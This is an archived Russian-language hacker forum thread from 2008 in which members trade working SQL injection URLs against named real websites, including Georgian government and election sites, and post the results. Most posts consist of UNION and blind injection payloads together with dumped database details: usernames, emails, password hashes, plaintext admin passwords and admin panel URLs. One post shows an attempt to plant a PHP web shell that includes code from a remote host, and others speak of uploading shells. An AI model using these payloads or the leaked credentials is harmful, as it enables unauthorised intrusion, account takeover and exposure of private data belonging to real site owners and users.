Просмотр полной версии : SQL Инъекции
Qwazar,сорри,я просто,не увидел,Что ты хэшик вытащил...АА...я первее хэш вытащил))
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,table_name,4,5,6+from+informat ion_schema.tables--
user: presa_ge@localhost
dbname: presa_ge
version: 5.0.51
TAbles:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
menu_tree
news
page_types
user_group
users
--id
--user_username
--user_password
--user_firstname
--user_lastname
--user_email
--user_group
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,column_name,4,5,6+from+informa tion_schema.columns+where+table_name=0x7573657273--
presa.ge:c1ab283404b71a940807009023a764bd:xx@XX.xx
******************************************
abs-tech.comSQL-injection
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,2,3,4,5, 6
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,concat_w s(0x3a,version(),user()),3,4,5,6
Version:5.0.51-locaweb-log
User:abs_tech1@200.234.200.132
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,table_na me,3,4,5,6+from+information_schema.tables
Tables:
tb_fornecedores
tb_mais_informacoes
tb_noticias_arquivos
tb_tickers
tb_downloads
tb_links
tb_noticias
tb_produtos
tb_institucional
tb_menu
tb_novidades
tb_usuario
--email
--nivel
--id_usuario
--senha
--nome
http://www.abs-tech.com/produto.php?id_produto=376+union+select+1,concat_w s(0x3a,id_usuario,email,nivel,senha,nome),3,4,5,6+ from+tb_usuario
1:w3:1:radum123:W3 Criações
http://www.abs-tech.com/admin/
login:w3
password:radium123
Но я там оказался не одним из первых:
http://s48.radikal.ru/i119/0808/97/5280227bc3act.jpg (http://radikal.ru/F/s48.radikal.ru/i119/0808/97/5280227bc3ac.jpg.html)
DimOnOID
10.08.2008, 02:33
_http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,concat_ws(0x3a,user() ,version(),database()),6,7,8,9,10,11,12,13/*
смело ковыряем)
http://www.hereandnow.ru/index.php?ids=1%20UNION%20SELECT%201,2,3,concat_ws (0x3a,version(),database(),user()),5,6,7%20LIMIT%2 01,1/*
4.1.22:hereandnow:hereandnow@localhost
_http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,concat_ws(0x3a,user() ,version(),database()),6,7,8,9,10,11,12,13/*
смело ковыряем)
много таблиу от PhpBB ,но нету доступа к таблицы phpbb_users :(
DimOnOID
10.08.2008, 03:11
много таблиу от PhpBB ,но нету доступа к таблицы phpbb_users :(
http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,user_id,6,7,8,9,10,11 ,12,13+from+forum.phpbb_users/*
Как выяснилось позже..это приватный форум
forum.
sanet
.ge
туда доступа нету( :(
DimOnOID
10.08.2008, 03:15
http://www.results.cec.gov.ge/major_olq.php?district=1%20or%201=@@version--
в MSSQL Не силён((
~!DoK_tOR!~
10.08.2008, 03:23
http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,user_id,6,7,8,9,10,11 ,12,13+from+forum.phpbb_users/*
Как выяснилось позже..это приватный форум
forum.
sanet
.ge
туда доступа нету( :(
///
http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=-1+union+select+1,2,3,4,concat_ws(0x3a,username,use r_password),6,7,8,9,10,11,12,13+from+forum.phpbb_u sers+limit+2,1/*
http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13+from+stat.users/*
~!DoK_tOR!~
10.08.2008, 03:29
http://www.results.cec.gov.ge/major_olq.php?district=1%20or%201=@@version--
в MSSQL Не силён((
http://www.results.cec.gov.ge/major_olq.php?district=1%20or%201=(SELECT+TOP+1+TA BLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
кодировка ппц )
dr.Pilulkin
10.08.2008, 12:02
http://www.adjara.gov.ge/eng/index.php?page=show&id=-919+union+select+1,2,3,version()--
www.president.gov.ge
http://www.president.gov.ge/index.php?l=G&m=0&sm=3&id=2693+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0/*
5.0.22-log
president_gov_ge
В таблице юзерс только один логин/пароль
nino:fe3af9dcad7c5f65ae0e8a19ba6cb1f0(ni654)
Админка: http://www.president.gov.ge/admin.php, но ацес дейнед-видимо лок по ип :(
kolkhida.ge
http://www.kolkhida.ge/rus/view_gancx.php?id=-7%27+union+select+1,2,3,4,5,6,7,8,9/*
4.1.20
test
www.museum.ge
http://www.museum.ge/web_page/index.php?id=-40+union+select+1,2,3,4,5,6,7,8,9
4.1.22-standard-log
museumg_zaza
Cennarios
10.08.2008, 13:20
http://www.norma.com.ua/main_description.php?newsletters_id=1'+union+selec t+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CONCA T(customers_email_address,0x3a3a,customers_passwor d)+FROM+customers+limit+32,1)),0x71),0x71),4,5,6/*
Походу опять многократный хеш....
S0ulVortex
10.08.2008, 14:02
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5, 6,7,8,9,0/*
Помогите плиз незнаю что дальше делать :( я просто только начинаю все осваивать и несовсем получается.
S0ulVortex вопросы по уязвимостям не сюда,дальше либо брут(если четвертая),либо вывод таблиц (если пятая) на сайте есть отличный фак! Читай!
http://www.safelider.ru/view.php?item=-2877+union+select+1,user(),database(),version(),5, 6,7,8,9,0/*
Помогите плиз незнаю что дальше делать :( я просто только начинаю все осваивать и несовсем получается.
вот, просмотрел немного бд.
Version: 5.0.45-log
User: u13238@10.10.223.207
Database name: u13238
Database name: u13238_2
Database name: u13238_3
и кончилось терпение))
u13238.users
id:login:PASSWORD:fullname:email
3:v87zmi39:$1$8H$WcE80yjcg7U6/lAyfPhc80:Константин:admin@shifr.com
11:odin:$1$E8$LTHwBBzaSQuFt2urqBkF5.:Андрей Ганзевич:odin@2upost.com
9:v650mdr5:$1$QJ$1ULsLd3yP3jemXdo7l7Kt.:Андре й Сидоров:shop@vozmi.ru
Cennarios
10.08.2008, 15:09
http://koshhejjka.sirenes.ru/index.php?d=22&p=-1+union+select+concat(name,0x3a3a,e_mail,0x3a3a,pa ss),2,3,4+from+tbl_artist+limit+1,10/*
Косяковые гловы....
login: webmaster@avoska.com
pass: jxtymcnhfiyjtrbyj
http://perekrestok.ca/
http://perekrestok.ca/?page=countries&country_id=-1+union+select+1,2,unhex(hex(concat(login,0x3,pass word,0x3,email,0x3,icq))),4,5,6,7+from+users+limit +0,0--
4.1.20�inetlaba_perek@localhost�inetlaba_perek
Admin�van1238�admin@torgprom.com.ua�111
Superadmin�vfhbzuelbyf�info@integra-isc.com
gendolf�vfhbzuelbyf�gendolff@yahoo.ca
-=Static=-
10.08.2008, 19:49
вот, просмотрел немного бд.
Version: 5.0.45-log
User: u13238@10.10.223.207
Database name: u13238
Database name: u13238_2
Database name: u13238_3
и кончилось терпение))
На этой же базе висит сайт:
http://vozmi.ru
ТИЦ: 130
PR: 4
http://vozmi.ru/furniture/catalog.php?catalog=-97+union+select+user(),2,3/*
dr.Pilulkin
10.08.2008, 21:48
http://www.results.cec.gov.ge/ubnebi.php?district=22+and+1=@@version--
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.fofg.org/act/act_petition.php?pid=-1+union+select+1,2,3,4,5,6,7/*
version:4 =\
*******************
http://www.nationmultimedia.com/qvote/view_poll.php?page=13&pid=-239+union+select+1,convert(version()+using+latin1) ,3
version:4=\
*******************
http://www.cetim.ch/fr/publications_details.php?pid=-115+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5/*
Version:5.0.45-log3
user:cetimweb@imu129.infomaniak.ch3
http://www.cetim.ch/fr/publications_details.php?pid=-115+union+select+1,table_name,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5+from+information_schema. tables+limit+18,10/*
ничего интересного - сайт носит информационный характер
---------------------------------------------------------------------
http://www.solfocus.com/product.php?pid=-4+union+select+1,versio(),3,4,5,6,7,8/*
User:root@localhost
Version:5
http://www.solfocus.com/product.php?pid=-4+union+select+1,table_name,3,4,5,6,7,8+from+infor mation_schema.tables+limit+18,10/*
Есть таблица db,копия mysql.user
http://www.solfocus.com/product.php?pid=-4+union+select+1,concat_ws(0x3a,user,password),3,4 ,5,6,7,8+from+mysql.user/*
root:*2F69143FB5C4B18522CA1EC561E137AB9D3F9170
Не могу залить шелл,расскажете если кто-то зальет)
а то я и так делал:http://www.solfocus.com/product.php?pid=-4+union+select+1,<? @include("http://*****.narod.ru/shell.txt"); ?>,3,4,5,6,7,8+from+mysql.user+into+outfile+'C:\Inet pub\phproot\hex.php'/
и в HEX фигачил,все равно не помогло =(
http://www.fergusonhill.co.uk/
http://www.fergusonhill.co.uk/product_details.php?id=7+union+select+1,2,3,4,5,6, 7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
Cennarios
11.08.2008, 02:21
Ахтунг! =)
http://www.stayer.su/index.php?res=collection&cmd=view&id=-1+union+select+concat(login,0x3a3a,password,0x3a3a ,name,0x3a3a3a3a)+from+users+limit+0,1/*
Сначала пытался потыкать админовскими реквизитами в формочку авторизации на главной страничке сего чудного сайта. Не получилось. Хитрый администратор спрятал мою админку в http://www.stayer.su/adm
Логинимся. Заливаем шел.
Юзаем: тут был шел ...
Calcutta
11.08.2008, 11:22
http://bdigital.biz/index.php?pageid=214+AND+ascii(lower(substring(ver sion(),1,1)))=51
version=3.*.*.*
S0ulVortex
11.08.2008, 14:52
http://www.avtobamper.ru/item_view.php?id=49&item_id=-1+union+select+1,2,3,Version(),5,user(),7,database (),9,10,11,12,13/*
Можно чёнють седлать? Пытался нече неполучилось :(
Вот ещё немагу найти админку, все нашол а админку нет :)
http://www.good-food.ru/
Calcutta
11.08.2008, 16:34
http://hutro.com/index.php?pageid=15+union+select+1,2,concat_ws(0x3 a,user(),database(),version()),4,5,6,7,8,9,10,11,1 2--
hutro_hutro@localhost:hutro_hutro:4.1.22-standard-log
http://hutro.com/index.php?pageid=15+union+select+1,2,table_name,4, 5,6,7,8,9,10,11,12+from+information_schema.tables+ limit+0,1--
выдает:SELECT * FROM aadm_menu WHERE id=15 union select 1,2,table_name,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 0,1--: SELECT command denied to user 'hutro_hutro'@'localhost' for table 'tables'
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/hutro/public_html/index.php on line 86 :(
Calcutta
11.08.2008, 17:08
вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19--
http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(ver sion(),1,1)))=52--
version() = 4.*.*.*
edited:
http://www.amanda-nylons.com/index.php?pageID='
странно как-то -) order+by говорит что 1 колонка, а union+select+1 никак вообще. мож кто разберется.
вообще без вывода: http://biomac.ru/index.php?pageid=117+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19--
http://biomac.ru/index.php?pageid=117+AND+ascii(lower(substring(ver sion(),1,1)))=52--
version() = 4.*.*.*
http://biomac.ru/index.php?pageid=-117+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19--
Сайт: www.blackratpress.co.uk PR=5
http://www.blackratpress.co.uk/event.php?id=9+union+select+1,concat_ws(0x3a,usern ame,password),3,4,5,6,7+from+admin_login+limit+2,1/*
Админка:
http://www.blackratpress.co.uk/admin/
Логин и пароль админа:
abovo:1010cambourne
Пытался залить шелл, ничего не получлось, у кого получится отпостите...
http://www.aliyahjobcenter.org/page.php?id=50[SQL]
DBname: israemploy
User: israemploy@localhost
Version: 5.0.45-log
user
id:login:password:userType:permissionLevel
1:yisrael:w3X-5j4Q:Programmer:3
2:danbarry:P*4t7r9~a$:Programmer:3
3:isaac:issac:Programmer:3
4:macron:n<5f3r8&K+:Regular:3
5:lubrob:w$2u5m9#G*:Regular:3
8:test:test:Regular:3
админку не нашол(( кто найдет - в личку плз.
Calcutta
11.08.2008, 19:40
http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,concat_ws(0x3a,user(),v ersion(),database()),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57--
crimeahouseru@localhost:5.0.26-log:dbm_www_crimeahouse_ru
http://crimeahouse.ru/index.php?pageId=24&id=-111+union+select+1,2,3,4,5,mail,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,52,53,54,55,56,57+from+mail+limit+72 3,1--
мыльники - самое интересное, что можно вытащить, кажется >_>
________________
http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,2,3,4,5
http://www.makc-m.nnov.ru/faq.php?id_faq=-155+union+select+1,table_name,3,4,5+from+informati on_schema.tables+limit+0,1--SELECT * FROM faq WHERE id_faq=-155 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--
Error: SELECT command denied to user 'makcm'@'localhost' for table 'tables'
К сожалению, сервис Вопрос-Ответ недоступен
fabbrigroup.com
http://www.fabbrigroup.com/rides.php?cat=-9+union+select+concat(0x3,version())/*
5.0.45�fabbrigroup_com@localhost�fabbrigroup_com
http://www.fabbrigroup.com/rides.php?cat=-9+union+select+password+from+fabbrigroup_users+lim it+0,1/*
admin:aec5dd86377b6754b9509a775a0e2a26:ruotino
http://www.realestate.com.pr
5 ветка
http://www.realestate.com.pr/sale/?pueblo=52+and+5=substring((version()),1,1)&town=Morovis&state=Puerto%20Rico
админку не нашел..
http://www.pumpi.com.mk
version = 4
http://www.pumpi.com.mk/NewsSingle.php?id=-5+union+select+1,version()
forbidden http://www.pumpi.com.mk/admin/
http://www.pumpi.com.mk
version = 4
http://www.sankeram.com.mk/content.php?id=11+and+4=substring(version(),1,1)
http://www.nibm.com.mk
4 ветка
http://www.nibm.com.mk/content.php?id=23+and+4=substring((version()),1,1)
админка (http://www.nibm.com.mk/admin/login.php)
http://www.sport.gov.mo
4 version
есть табличка users c полями username,password
http://www.sport.gov.mo/web/pt/aviso/details.php?id=-1331+union+select+1,concat_ws(0x3a3a3a,username,pa ssword),3,4+from+users+limit+0,1/*
username = cat
password = catch
только вот не подходят они...(
http://www.uni-care.com.mo
5 ветка
http://www.uni-care.com.mo/info_detail.php?id=-9+union+select+1,version(),3,4,5/*
директория C:\Inetpub\vhosts\uni-care.com.mo\httpdocs\info_detail.php
http://www.cpttm.org.mo
4 ветка
http://www.cpttm.org.mo/news_e.php?id=-56+union+select+1,2,3,4,5,unhex(hex(version())),7, 8,9,10,11,12,13,14,15,16/*
директория D:\wwwroot2\news.php
http://www.lev.me
version() = 4.0.27-max-log
http://www.lev.me/comments.php?id=-84+union+select+1,2,3,4,version(),6,7/*
http://www.congress.gov.ph/press/details.php?pressid=-2528
1,2,3,4,5,6,7,8
User:congres_egovern@pregi-web.pregi.net
Database:congres_hrep
Version:4.0.24_Debian-10sarge2-log
Calcutta
12.08.2008, 13:26
http://fastflowerstoukraine.com/index.php?pageid=5+union+select+1,2,3,4,5,6,7,8,9, 10,11,12--
кто раскрутит до конца?
http://schalter.ru/page.php?id_level=
http://fastflowerstoukraine.com/index.php?pageid=5+union+select+1,2,3,4,5,6,7,8,9, 10,11,12--
кто раскрутит до конца?
http://schalter.ru/page.php?id_level=
обходим гору
http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ver sion(),database()),7,8,9,10,11,12,13,14,15,16,17/*
Calcutta
12.08.2008, 14:11
обходим гору
http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ver sion(),database()),7,8,9,10,11,12,13,14,15,16,17/*
http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name ),7,8,9,10,11,12,13,14,15,16,17+from+information_s chema.tables+limit+0,1/**
а дальше?
http://www.lvif.gov.lv/?object_id=-376[sql]
Dbname: videsinvfonds
Version: 5.0.24
User:videsinvfonds@localhost
логиниться - нелогинится..продолжение в админках)
http://fastflowerstoukraine.com/local/plug-in/a-price/showone.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,table_name ),7,8,9,10,11,12,13,14,15,16,17+from+information_s chema.tables+limit+0,1/**
а дальше?
переходим в Ваши вопросы по уязвимостям. https://forum.antichat.ru/lastpostinthread46016.html
therapyshoppe.com
http://www.therapyshoppe.com/product.php?cat=-8+union+select+1,concat_ws(0x3a3a,version(),user() ,database())/*
5.0.45-log::therapyshoppe@cgi0403.int.bizland.net::therap yshoppe
http://www.therapyshoppe.com/product.php?cat=-8+union+select+1,concat(table_name,0x3a3a3a,table_ schema)+from+information_schema.tables+limit+20,1/*
Список таблиц:
categories
descriptions
products
specials
Собственно нечего интересного(
http://www.cageprisoners.com/
http://www.cageprisoners.com/articles.php?id=25632'+order+by+6/*
Кол-во столбцов =6
http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,3,4,5,6/*
version : 5.0.45
database : cagepris_cms
user : cagepris_cms@localhost
http://www.cageprisoners.com/articles.php?id=-25632+union+select+1,2,table_name,4,5,6+from+infor mation_schema.tables+limit+17,10/*
Таблица - admins
Хеш пароля : QYYoUiD1cbIlTi2jPbgoQ0
Админка:
http://www.cageprisoners.com/admin/login.php?accessdenied=%2Fadmin%2F
P.S. Подскажите что за вид хеша!?
http://allmitino.ru
5-ая ветка
http://allmitino.ru/catalog/responses/?org_id=-1690+union+select+1,2,3,4,5,6,7,version(),9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31
есть таблички phpbb_users,allm_admin,allm_users
админка (http://allmitino.ru/admin/login.php)
katie:::03e682cf75e3b31d
kirill:::10edb41c7e718497
пароли вроде шифровались mysql
Люди посматрите пожалуйста ентот сайт http://pw.spark-games.ru/indexx.php (попрошу обратить внимание на мини чат!) Вот регистрация тоже не понятно http://pw.spark-games.ru/registration.php попробуйте зарегить новый акк есть ошибки скульные!
PR-6 от гарварда сайтек какой-то.
http://www.pluralism.org/news/article.php?id=10536
42
name:pluralsm@www8.serve.com
Version:4.1.20-log
Dbname:news
http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(version(),0x3a,user (),0x3a,database()),4,5/*
5.0.26
root@localhost
hqvideo
http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_schema,0x3a,t able_name,0x3a,column_name),4,5+from+information_s chema.columns/*
http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_name,0x3a,col umn_name),4,5+from+information_schema.columns/*
кто шэл зальёт опешитесь
PandoraBox
13.08.2008, 04:36
http://www.profvideo.ru/index.php?ids=-501+union+select+1,2,version(),concat_ws(0x3a3a,us er(),database()),5,6,7,8,9,10,11,12/*
4.1.22
profvideo@localhost
profvideo
Люди посматрите пожалуйста ентот сайт http://pw.spark-games.ru/indexx.php (попрошу обратить внимание на мини чат!) Вот регистрация тоже не понятно http://pw.spark-games.ru/registration.php попробуйте зарегить новый акк есть ошибки скульные!
Ошибки при реге , это у них SQL сервер недоступен/орублен.
Calcutta
13.08.2008, 10:47
Интернет-магазин:
http://webkoleso.ru/index.php?pageId=-111111+union+select+1,2,3,concat_ws(0x3a,user(),ve rsion(),database()),5,6,7,8,9--
_________________________________________
edited:
http://magazine.ge/index.php?page=events&id=22+union+select+1,2,3,4,5,6,7,8,9--
http://svrwheels.ru/index.php?pageId=-111+union+select+1,2,3,4,5,6,7,8--
http://ihf-hr.org/documents/doc_summary.php?sec_id=1+union+select+1,concat_ws( 0x3a,version(),user(),database()),3-- <<<----с дальнейшим выводом проблемы :-/
S0ulVortex
13.08.2008, 16:31
http://vesnasouvenir.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://trol.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://expoland.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://vesnaboard.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://www.eva.dp.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://www.cifrotech.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://ops-print.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://vesnanaruzhka.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://vp.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://www.kominmet.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
http://piton.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,u s er_login,user_passw),4,5,6,7+from+auth_users+limit +3,10/*&cat=2
Все сайты управляются отсюда
http://www.as-admin.com/index.php
Жаль такого на юкоз нету :D
Воть
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.columns/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.SCHEMATA/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.tables/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+users/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+dual/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+phpbb_users/*
http://www.amplemama.ca/product-details.php?prid=20%&prname=Maternity%20Office%20Wear&sprid=&sprname=&product=64+union+select+1,username,3,password,5,6, 7,8,9,10,11,12+from+login/*
amplemama@82.165.233.47
4.1.7-nt
connetik_ample
админк:
http://www.amplemama.ca/bizcura/
аплоад картинок, но..ничего больше(
Calcutta
13.08.2008, 18:04
http://solf.ru/main.php?p=-111+union+select+1,column_name,3+from+information_ schema.columns+where+table_name=0x7573657273+limit +0,1--
users:
-id
-username
-password
-fname
-email
http://solf.ru/main.php?p=-111+union+select+1,column_name,3+from+information_ schema.columns+where+table_name=0x7961626c6f6b6f6d 61696c+limit+1,1--
mail:
-id
-email
-name
-code
дальше кому интересно - уже сами -)
S0ulVortex
13.08.2008, 18:51
http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,1,2,3+from+drinksadmin/*
админка
http://www.fivedollarscripts.com/drinks/admin2
Ну тут тупо инекция пашет а в админку непопасть.
Calcutta
13.08.2008, 20:39
http://all4sims.de/board/filebase.php?userid=1'
lol истина гдето рядом -) мож даже скуль есть..
SQL-DATABASE ERROR
Database error in WoltLab Burning Board (2.3.6 pl2): Invalid SQL: SELECT username FROM bb1_users WHERE userid='1''
mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
mysql error number: 1064
mysql version: 5.0.45-community
php version: 4.4.9
Date: 13.08.2008 @ 18:37
Script: /board/filebase.php?userid=1'
Referer:
http://all4sims.de/board/filebase.php?userid=1'
lol истина гдето рядом -) мож даже скуль есть..
я так не думаю <_<
S0ulVortex
13.08.2008, 21:38
http://www.myfourthirds.com/folder.php?id=370+and(1=2)+union+select+1,2,3,4,5, %206,7,8,concat_ws(0x3a,us er_email,user_passwd),10,11%20+from+users --
http://www.ostim.org.tr/ostim/product.php?lang=ALM&productID=1+UNION+SELECT+concat_ws(0x3a,version(), database(),user()),2,3/*
5.0.22:samidb:sami@localhost
table
[samidb]
[OLDcontentstatistics]
secenek
lang
tarih
[adresler]
adres
[anket]
ankettipi
anket
yayintarihi
kaldirmatarihi
icerik
=)
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+user/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SC HEMA.columns/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SC HEMA.SCHEMATA/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+INFORMATION_SC HEMA.tables/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+user/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+dual/*
[OK] http://www.swissport-executive.com/contacts/cities.php?cont_id=-2+UNION+SEL
ECT+1,2,3,4,5,6,7,8,9,10,11,12+FROM+news/*
[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.columns/*
[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.SCHEMATA/*
[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.tables/*
[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+contacts/*
[OK] http://www.drumskillz.com/cont_view.php?cont_id=-91+UNION+SELECT+1,2,3,4+FR
OM+dual/*
S0ulVortex
13.08.2008, 23:07
http://members.lycos.co.uk/lyk7/gallery/viewphoto.php?photo_id=-1+UNION+SELECT+0x73716C696E6A666C6431,0x73716C696E 6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A66 6C6434,concat(0x3a,version(),database(),us er()),0x73716C696E6A666C6436,0x73716C696E6A666C643 7,0x73716C696E6A666C6438,0x73716C696E6A666C6439 --
Version:4.0.18-standard
DBname:lyk7_uk_db
User:lyk7_uk@eu1667f.lyceu.net
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+INFORMAT ION_SCHEMA.columns/*
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+INFORMAT ION_SCHEMA.SCHEMATA/*
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+INFORMAT ION_SCHEMA.tables/*
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+customer s/*
[OK] http://www.wellness.lt/index.php?link=news&sublink=news_archiv&cont_id=-35+
UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11+FROM+dual/*
[OK] http://www.cleverits.de/news_start.php?cont_id=1&news_id=-326+UNION+SELECT+
1,2,3+FROM+user/*
[OK] http://www.cleverits.de/news_start.php?cont_id=1&news_id=-326+UNION+SELECT+
1,2,3+FROM+user/*
[OK] http://www.cleverits.de/news_start.php?cont_id=1&news_id=-326+UNION+SELECT+
1,2,3+FROM+news/*
